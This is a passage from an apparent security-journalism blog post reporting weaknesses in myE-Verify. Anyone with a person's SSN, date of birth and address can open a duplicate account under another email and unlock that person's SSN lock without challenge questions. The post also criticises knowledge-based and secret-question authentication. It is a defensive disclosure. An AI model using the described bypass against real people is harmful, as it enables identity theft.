But I still had to know one thing: Could someone else come along pretending to be me and create another account using my SSN, date of birth and address but under a different email address? Using a different browser and Internet address, I proceeded to find out.

Imagine my surprise when I was able to create a separate account as me with just a different email address (once again, the correct answers to all of the KBA questions were “none of the above”). Upon logging in, I noticed my SSN was indeed locked within E-Verify. So I chose to unlock it.

Did the system ask any of the challenge questions it had me create previously? Nope. It just reported that my SSN was now unlocked. Logging out and logging back in to the original account I created (again under a different IP and browser) confirmed that my SSN was unlocked.

ANALYSIS

Obviously, if the E-Verify system allows multiple accounts to be created using the same name, address, phone number, SSN and date of birth, this is less than ideal and somewhat defeats the purpose of creating one for the purposes of protecting one’s identity from misuse.

Lest you think your SSN and DOB are somehow private information, you should know this static data about U.S. residents has been exposed many times over in countless data breaches, and in any case these digits are available for sale for most Americans via dark web sites for roughly the bitcoin equivalent of a fancy caffeinated drink at Starbucks.

Being unable to proceed through knowledge-based authentication questions without first unfreezing one’s credit file with one or all of the big three credit bureaus (Equifax, Experian and TransUnion) can actually be a plus for those of us who are paranoid about identity theft. I couldn’t find any mention on the E-Verify site of which company or service it uses to ask these questions, but the fact that the site doesn’t seem to care whether one has a freeze in place is troubling.

And when the correct answer to all of the KBA questions that do get asked is invariably “none of the above,” that somewhat lessens the value of asking them in the first place. Maybe that was just the luck of the draw in my case, but also troubling nonetheless. Either way, these KBA questions are notoriously weak security because the answers to them often are pulled from records that are public anyway, and can sometimes be deduced by studying the information available on a target’s social media profiles.

Speaking of silly questions, relying on “secret questions” or “challenge questions” as an alternative method of resetting one’s password is severely outdated and insecure. A 2015 study by Google titled “Secrets, Lies and Account Recovery” (PDF) found that secret questions generally offer a security level that is far lower than just user-chosen passwords. Also, the idea that an account protected by multi-factor authentication could be undermined by successfully guessing the answer(s) to one or more secret questions (answered truthfully and perhaps located by thieves through mining one’s social media accounts) is bothersome.

Finally, the advice given to the reader whose inquiry originally prompted me to sign up at myE-Verify doesn’t seem to have anything to do with preventing ID thieves from fraudulently claiming unemployment insurance benefits in one’s name at the state level. KrebsOnSecurity followed up with four different readers who left comments on this site about being victims of unemployment fraud recently, and none of them saw any inquiries about this in their myE-Verify accounts after creating them. Not that they should have seen signs of this activity in the E-Verify system; I just wanted to emphasize that one seems to have little to do with the other.